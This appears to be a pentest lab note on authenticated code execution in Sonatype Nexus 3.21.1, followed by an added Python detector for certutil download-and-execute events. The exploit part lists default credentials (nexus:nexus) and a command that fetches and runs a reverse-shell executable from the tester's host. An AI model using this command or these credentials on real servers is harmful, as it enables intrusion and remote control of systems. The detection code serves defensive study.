Sonatype Nexus 3.21.1

This application is vulnerable to Remote Code Execution with valid credentials.

That is the catch in this case: we have to try different default credentials, even nexus:nexus, or see whether we can find valid credentials in an SMB share or on an FTP server.

#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'

The exploit requires you to send a cmd command, which I just changed to make the computer get one of my files. Afterwards we would get a reverse shell.
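From the blue-team side, the command above leaves a clear trace in process-creation logs: certutil fetching a remote file with -urlcache and the same file being run in the same command line, under the Nexus service. The following is an added example, not part of the original exploit or of Nexus. It assumes events are already parsed into dicts with hypothetical "parent" and "cmdline" keys, and that the Nexus service shows up as java.exe or nexus.exe.

```python
import re

# Assumption: process-creation events (e.g. Sysmon Event ID 1 or Windows 4688)
# already parsed into dicts with "parent" and "cmdline" keys.
CERTUTIL = re.compile(r"\bcertutil(?:\.exe)?\b", re.I)
URLCACHE = re.compile(r"[-/]urlcache\b", re.I)
URL = re.compile(r"https?://\S+", re.I)
# Assumption: the Nexus service appears as java.exe or nexus.exe on Windows.
JVM_PARENTS = {"java.exe", "javaw.exe", "nexus.exe"}


def score_event(event):
    """Return the reasons a process-creation event matches the
    certutil download-and-run pattern shown on this page."""
    cmd = event["cmdline"]
    reasons = []
    if not (CERTUTIL.search(cmd) and URLCACHE.search(cmd)):
        return reasons
    reasons.append("certutil -urlcache used")
    url = URL.search(cmd)
    if url:
        reasons.append("remote URL: " + url.group(0))
        # File name from the URL reappearing after "&&" means download-then-execute.
        name = url.group(0).rstrip("/").rsplit("/", 1)[-1]
        tail = cmd.split("&&", 1)[1] if "&&" in cmd else ""
        if name and name.lower() in tail.lower():
            reasons.append("downloaded file executed in same command")
    parent = event["parent"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if parent in JVM_PARENTS:
        reasons.append("spawned by JVM/Nexus process: " + parent)
    return reasons


def flag_events(events):
    """Return (event, reasons) pairs for every event with at least one hit."""
    return [(e, r) for e in events if (r := score_event(e))]


# Constructed sample events; paths are made up, addresses use documentation ranges.
SAMPLE = [
    {"parent": r"C:\nexus\jre\bin\java.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -f http://192.0.2.10:80/payload.exe payload.exe && payload.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f https://192.0.2.20/tool.zip tool.zip"},
]
```

An event that collects all four reasons, as the first sample does, is a high-confidence alert; certutil -urlcache on its own is worth review but can be legitimate admin activity.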
